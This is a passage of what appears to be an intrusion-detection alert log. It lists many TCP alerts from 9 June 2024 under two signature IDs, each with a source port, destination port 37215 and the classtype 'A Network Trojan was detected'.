          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398257
          SID:2829579
          Source Port:34976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557713
          SID:2835222
          Source Port:42788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.681906
          SID:2829579
          Source Port:33736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637923
          SID:2829579
          Source Port:34574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718210
          SID:2835222
          Source Port:39690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033525
          SID:2835222
          Source Port:39594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227199
          SID:2829579
          Source Port:49038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080825
          SID:2829579
          Source Port:58676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719012
          SID:2835222
          Source Port:47004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227263
          SID:2829579
          Source Port:36444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038929
          SID:2829579
          Source Port:32904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306402
          SID:2829579
          Source Port:58678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225322
          SID:2835222
          Source Port:38682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418694
          SID:2829579
          Source Port:45142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.887774
          SID:2835222
          Source Port:60656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900136
          SID:2829579
          Source Port:41592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926210
          SID:2829579
          Source Port:51306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945024
          SID:2835222
          Source Port:53504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133934
          SID:2829579
          Source Port:37722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870613
          SID:2829579
          Source Port:60104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823565
          SID:2835222
          Source Port:53104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036204
          SID:2829579
          Source Port:57304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823405
          SID:2829579
          Source Port:49532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538482
          SID:2829579
          Source Port:60300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605992
          SID:2835222
          Source Port:54266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561747
          SID:2829579
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557206
          SID:2835222
          Source Port:51860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946538
          SID:2835222
          Source Port:57996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469258
          SID:2829579
          Source Port:54166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821041
          SID:2829579
          Source Port:41618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035624
          SID:2829579
          Source Port:53158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130551
          SID:2835222
          Source Port:57632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034520
          SID:2835222
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166845
          SID:2829579
          Source Port:59522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.594241
          SID:2829579
          Source Port:48754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301339
          SID:2835222
          Source Port:49414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718974
          SID:2835222
          Source Port:45838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645508
          SID:2829579
          Source Port:48730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466083
          SID:2835222
          Source Port:33012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998437
          SID:2835222
          Source Port:41936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165569
          SID:2835222
          Source Port:44506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033684
          SID:2829579
          Source Port:48580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103803
          SID:2835222
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034608
          SID:2835222
          Source Port:60012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.658201
          SID:2829579
          Source Port:57994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281199
          SID:2835222
          Source Port:38350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397985
          SID:2835222
          Source Port:57896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870712
          SID:2835222
          Source Port:47512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041493
          SID:2829579
          Source Port:50364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244850
          SID:2829579
          Source Port:45268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282418
          SID:2835222
          Source Port:56040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644728
          SID:2829579
          Source Port:48520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917904
          SID:2829579
          Source Port:35182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.678237
          SID:2835222
          Source Port:45698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718068
          SID:2835222
          Source Port:50836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035930
          SID:2829579
          Source Port:36230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948551
          SID:2829579
          Source Port:37348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028282
          SID:2835222
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560559
          SID:2835222
          Source Port:51134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080663
          SID:2829579
          Source Port:35616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862083
          SID:2835222
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862726
          SID:2835222
          Source Port:54802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718952
          SID:2829579
          Source Port:40740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288245
          SID:2835222
          Source Port:53722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946781
          SID:2829579
          Source Port:56986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987330
          SID:2835222
          Source Port:33788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822494
          SID:2829579
          Source Port:55992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823119
          SID:2829579
          Source Port:33768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289528
          SID:2835222
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168798
          SID:2829579
          Source Port:51116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477582
          SID:2835222
          Source Port:50836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861340
          SID:2835222
          Source Port:35370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987107
          SID:2829579
          Source Port:51462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651531
          SID:2835222
          Source Port:35350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299286
          SID:2829579
          Source Port:39190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915945
          SID:2829579
          Source Port:33682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988946
          SID:2829579
          Source Port:34686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288006
          SID:2829579
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.134646
          SID:2829579
          Source Port:45510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077051
          SID:2835222
          Source Port:39376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165351
          SID:2835222
          Source Port:57230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539514
          SID:2835222
          Source Port:52538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993532
          SID:2835222
          Source Port:52652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909166
          SID:2835222
          Source Port:34192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867850
          SID:2835222
          Source Port:51670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247107
          SID:2835222
          Source Port:55968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993303
          SID:2829579
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537939
          SID:2835222
          Source Port:34550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931321
          SID:2829579
          Source Port:50270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397390
          SID:2829579
          Source Port:38574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032588
          SID:2835222
          Source Port:50502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945270
          SID:2835222
          Source Port:49574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716223
          SID:2829579
          Source Port:36610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253111
          SID:2835222
          Source Port:51678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104708
          SID:2829579
          Source Port:46752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.089565
          SID:2835222
          Source Port:36424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.480741
          SID:2835222
          Source Port:56058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010889
          SID:2829579
          Source Port:56108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037149
          SID:2835222
          Source Port:43080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603602
          SID:2829579
          Source Port:33386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074583
          SID:2835222
          Source Port:43938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468470
          SID:2835222
          Source Port:54084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820013
          SID:2829579
          Source Port:44484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923028
          SID:2829579
          Source Port:50312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168101
          SID:2835222
          Source Port:38164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950324
          SID:2829579
          Source Port:46696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206701
          SID:2829579
          Source Port:55716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719270
          SID:2829579
          Source Port:45400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418318
          SID:2835222
          Source Port:54138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.891141
          SID:2829579
          Source Port:47474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537862
          SID:2829579
          Source Port:35918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537828
          SID:2835222
          Source Port:44072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564117
          SID:2835222
          Source Port:47826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082061
          SID:2835222
          Source Port:53456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719620
          SID:2835222
          Source Port:38474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951646
          SID:2829579
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399288
          SID:2835222
          Source Port:58912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078072
          SID:2835222
          Source Port:49446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668666
          SID:2835222
          Source Port:50754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944253
          SID:2835222
          Source Port:50086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600280
          SID:2835222
          Source Port:37112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102547
          SID:2835222
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161029
          SID:2829579
          Source Port:42260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301151
          SID:2829579
          Source Port:59148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928467
          SID:2835222
          Source Port:58314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564869
          SID:2829579
          Source Port:53002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162614
          SID:2835222
          Source Port:50902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.297891
          SID:2835222
          Source Port:46600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821145
          SID:2829579
          Source Port:49262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273715
          SID:2835222
          Source Port:47544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251407
          SID:2835222
          Source Port:47858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944791
          SID:2835222
          Source Port:52686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246141
          SID:2829579
          Source Port:59562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076434
          SID:2829579
          Source Port:47920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163080
          SID:2835222
          Source Port:59026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553823
          SID:2835222
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818098
          SID:2829579
          Source Port:59550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944955
          SID:2835222
          Source Port:46608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643809
          SID:2835222
          Source Port:42984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417496
          SID:2835222
          Source Port:59524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077953
          SID:2835222
          Source Port:39488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643501
          SID:2829579
          Source Port:39848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414178
          SID:2829579
          Source Port:59934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417960
          SID:2835222
          Source Port:33560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223294
          SID:2835222
          Source Port:47016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080843
          SID:2835222
          Source Port:58662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289481
          SID:2829579
          Source Port:43118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166059
          SID:2835222
          Source Port:59774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120544
          SID:2835222
          Source Port:55576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251430
          SID:2829579
          Source Port:57688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468490
          SID:2835222
          Source Port:45670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923214
          SID:2829579
          Source Port:38000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928500
          SID:2835222
          Source Port:54224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306485
          SID:2835222
          Source Port:45932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915910
          SID:2835222
          Source Port:39764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987170
          SID:2829579
          Source Port:37296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598151
          SID:2829579
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916497
          SID:2829579
          Source Port:33104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399666
          SID:2829579
          Source Port:47154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227350
          SID:2829579
          Source Port:35528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.645102
          SID:2829579
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.091222
          SID:2829579
          Source Port:54006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398662
          SID:2829579
          Source Port:34270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644320
          SID:2829579
          Source Port:38988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000567
          SID:2829579
          Source Port:43624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567960
          SID:2835222
          Source Port:55570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163984
          SID:2829579
          Source Port:37974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993242
          SID:2835222
          Source Port:49076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415482
          SID:2829579
          Source Port:50402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008597
          SID:2829579
          Source Port:53566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398010
          SID:2829579
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718338
          SID:2835222
          Source Port:43402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.041895
          SID:2829579
          Source Port:40818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.988906
          SID:2835222
          Source Port:54884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103631
          SID:2835222
          Source Port:42820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716498
          SID:2829579
          Source Port:53446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892569
          SID:2835222
          Source Port:35742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076498
          SID:2835222
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645036
          SID:2829579
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.592752
          SID:2829579
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651359
          SID:2829579
          Source Port:47122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668805
          SID:2829579
          Source Port:47358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643615
          SID:2835222
          Source Port:37842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928616
          SID:2835222
          Source Port:34826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288585
          SID:2835222
          Source Port:46204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077031
          SID:2835222
          Source Port:50556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539779
          SID:2829579
          Source Port:39598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399504
          SID:2835222
          Source Port:34110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289059
          SID:2835222
          Source Port:52394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951064
          SID:2829579
          Source Port:58096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.067391
          SID:2829579
          Source Port:42894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224719
          SID:2829579
          Source Port:44840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645446
          SID:2835222
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418934
          SID:2829579
          Source Port:34244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.100805
          SID:2835222
          Source Port:58824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571527
          SID:2835222
          Source Port:57326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993794
          SID:2835222
          Source Port:51570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
